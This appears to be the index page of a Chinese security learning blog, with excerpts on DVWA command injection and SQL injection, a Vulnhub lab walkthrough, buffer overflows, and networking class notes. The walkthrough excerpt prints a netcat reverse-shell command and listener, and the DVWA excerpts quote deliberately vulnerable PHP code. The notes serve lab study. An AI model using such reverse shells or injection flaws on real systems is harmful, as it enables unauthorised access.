CrayBlog 
  • Home
  • Archives
  • Categories
  • Tags
  • About
  •     

web渗透基础三

命令执行以及反弹shell姿势还是DVWA靶机的Command Injection 功能是在本地使用shell_exec执行ping命令 Low<?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $target ); } else { // *nix $cmd = shell_exec( 'ping -c 4 ' . $target ); }
 2019-06-11   CTF    DVWA  php  linux  反弹shell 

web渗透基础二

宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围),而当我们输入有单引号时会自动加入\进行转义而变为\’(在PHP配置文件中magic_quotes_gpc=On的情况下或者使用addslashes函数,icov函数,mysql_real_escape_string函数、mysql_escape_string函数等,提交的参数中如果带有单引号’,就会被自动转义\’,使得多数注入攻击无效),由于宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,将后面的一个字节与前一个大于128的ascii码进行组合成为一个完整的字符(mysql判断一个字符是不是汉字,首先两个字符时一个汉字,另外根据gbk编码,第一个字节ascii码大于128,基本上就可以了),此时’前的\就被吃了,我们就可以使用’了,利用这个特性从而可实施SQL注入的利用。
 2019-06-11   CTF    宽字节注入 

web渗透基础一

这之后都会是巩固的笔记,把以前留下的坑填一下。 DVWA Brute Force通过这个靶机来温习下sql注入的一下要点和防御。 low源码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error()
 2019-06-10   CTF    DVWA  SQL注入 

silky:0x02靶机总结

靶机靶机来源vulnhub 下载 ova文件,VM 或 VB 都是可以直接打开的 渗透具体可以详细可以参阅 YouTube 我这里来记录下我的过程 扫主机nmap 10.0.0.0/24我的是这个网段 或者直接使用netdiscover进行主机发现,比不过比较慢 我这里的靶机IP是10.0.0.141 扫服务 nmap -A 10.0.0.141 扫出具体的端口及其服务。 发现 22 端口和 80 直接访问80 打开看是一个登陆页面,随意点点看,有个登陆页 后台路径遍历dirb http://10.0.0.141 /var/share/wordlists/dirb/common.txt 没有扫出什么有用的,搞登陆页 登陆页弱口令试试,没发现什么。hydra 爆破 http有待学习, 根据视频提示username 参数有代码执行 代码执行这里直接上一个nc的反弹shell nc 10.0.0.141 8848 -t -e /bin/bash 攻击机这边监听 nc -lnvp 8848 界面不好看,上一个python的pty python -c "import pty;pty.
 2019-06-03   CTF    linux  web渗透 

内存基础

原文地址 看点好玩的东西显然,并非每次应用程序崩溃都会导致漏洞利用。在许多情况下,应用程序崩溃不会导致利用…但有时它会。对于“exploitation”,我的意思是你希望应用程序做一些不打算做的事情……例如运行你自己的代码。使应用程序执行不应该执行的操作的最简单方法是控制其应用程序流(并将其重定向到其他位置)。这可以通过控制指令指针(或程序计数器)来完成,指令指针是一个CPU寄存器,它包含一个指针,指向需要执行的下一条指令所在的位置。假设应用程序使用参数调用函数。在转到函数之前,它将当前位置保存在指令指针中(因此它知道函数完成时返回的位置)。如果您可以修改此指针中的值,并将其指向内存中包含您自己的代码段的位置,那么您可以更改应用程序流并使其执行不同的操作(除了返回到原始位置)。您希望在控制流后执行的代码通常称为“shellcode”。因此,如果我们让应用程序运行我们的shellcode,我们可以将其称为有效的漏洞。在大多数情况下,此指针由术语EIP引用。该寄存器大小为4个字节。因此,如果您可以修改这4个字节,那么您拥有应用程序(以及运行应用程序的计算机) 在我们开始之前 - 一些理论
 2019-05-30   逆向    内存  溢出  栈 

TCP总结

这里总结下TCP的三次握手,数据传输和四次分手过程 pdf文件地址TCP图解 TCP头部 来源连接端口(16位长)-识别发送连接端口 目的连接端口(16位长)-识别接收连接端口 序列号(seq,32位长) 如果含有同步化旗标(SYN),则此为最初的序列号;第一个数据比特的序列码为本序列号加一。 如果没有同步化旗标(SYN),则此为第一个数据比特的序列码。 确认号(ack,32位长)—期望收到的数据的开始序列号。也即已经收到的数据的字节长度加1。 数据偏移(4位长)—以4字节为单位计算出的数据段开始地址的偏移值。 保留(3比特长)—须置0 标志符(9比特长) NS—ECN-nonce。 CWR—Congestion Window Reduced。 ECE—ECN-Echo有两种意思,取决于SYN标志的值。 URG—为1表示高优先级数据包,紧急指针字段有效。 ACK—为1表示确认号字段有效 PSH—为1表示是带有PUSH标志的数据,指示接收方应该尽快将这个报文段交给应用层而不用等待缓冲区装满。 RST—为1表示出现严重差错。可能需要重现创建TCP连接。还可以用于拒绝非法的报文段和拒绝连接
 2019-05-14   课堂笔记    TCP 

https 工作原理

https学习资料 https基本原理1 https基本原理2 ssl原理解释
 2019-05-13   课堂笔记    https 

tcpdump 记录

tcpdump一些常用的选项。-s number:tcpdump默认只会截取前96字节的内容,要想截取所有的报文内容,就需要使用这个选项,其中number是需要截取的报文字节数,如果是0的话,表示截取报文全部内容; -nn:表示不解析域名,直接显示IP,在netstat命令中,也有这个选项; -X:同时使用hex和ascii显示报文内容; -S:显示绝对的序列号(sequence number),而不是相对编号; -i:指定监听的网卡,如果为-i any则表示监听所有的网卡; -v,-vv,-vvv:显示更多的详细信息; -c number:表示截取number个报文,然后结束; -w:将监听到的数据包写入文件中保存,而并不分析和打印出来; -A:只使用ascii打印报文的全部数据,不要和-X选项一起使用。截取HTTP请求的时候可以用sudo tcpdump -nSA port 80 过滤器先进行使用实例详解时,有必要先掌握tcpdump一些基本的使用理论知识,先来说说过滤器。 在服务器上的网络报文是异常的多,很多时候我们只关注和具体问题有关的数据报文,而这些有用的报文只占到很小的一部
 2019-05-13   课堂笔记    TcpDump 

HWTACACS和RADIUS的区别

一 HWTACACS和RADIUS的区别 1 传输层协议两者使用的传输层协议不同,HWTACACS使用的是TCP,而RADIUS采用的是UDP; 2 认证、授权方式HWTACACS的认证、授权相互独立,如果把命令行设置为HWTACACS模式,则这个命令行的每一条命令都需要经过认证。而RADIUS的认证和授权是捆在一起的; 3 加密方式HWTACACS对用户报文会进行整个加密,而RADIUS仅对用户密码进行加密。 二 HWTACACS和RADIUS使用场合当用户需从本地网络与NAS建立连接从而取得访问其他网络的权利或取得使用某些网络资源时,一般都需对此类用户接入请求进行认证、授权和计费等。认证为合法用户将被分配网络资源,同时可对用户上线时间统计计时,并拒绝非法用户的请求。电信运营商和一些院校及企事业单位一般都采用HWTACACS或RADIUS服务器对接入用户进行有效控制,保证网络安全性和计时(方便计费)。
 2019-05-12   课堂笔记    HCIP 

HCIP-security了解

HCIP-Security 知识架构HCP1 HCIP-Security CISN构建安全网络架构 * 网络安全设备管理 * 网络安全设备介绍 * 网络安全设备管理 * 网络安全设备日志分析 * 网络安全设备统一运维 * 防火墙带宽管理 * 防火墙带宽管理概述 * 防火墙带宽管理实现原理 * 防火墙带宽管理配置部署 * 防火墙带宽管理故障排除 * 防火墙负载均衡 * 服务器负载均衡概述 * 服务器负载均衡实现原理 * 服务器负载均衡配置部署 * 防火墙高可靠性 * BFD技术 * IP-Link技术 * Link-Group技术 * Eth-Trunk技术 * Bypass技术 * 双机热备技术 * 双机热备故障排除 * 防火墙虚拟系统 * 虚拟系统概述 *
 2019-05-11   课堂笔记    HCIP  计算机网络 
  • 上一页
  • 下一页

搜索

Hexo Fluid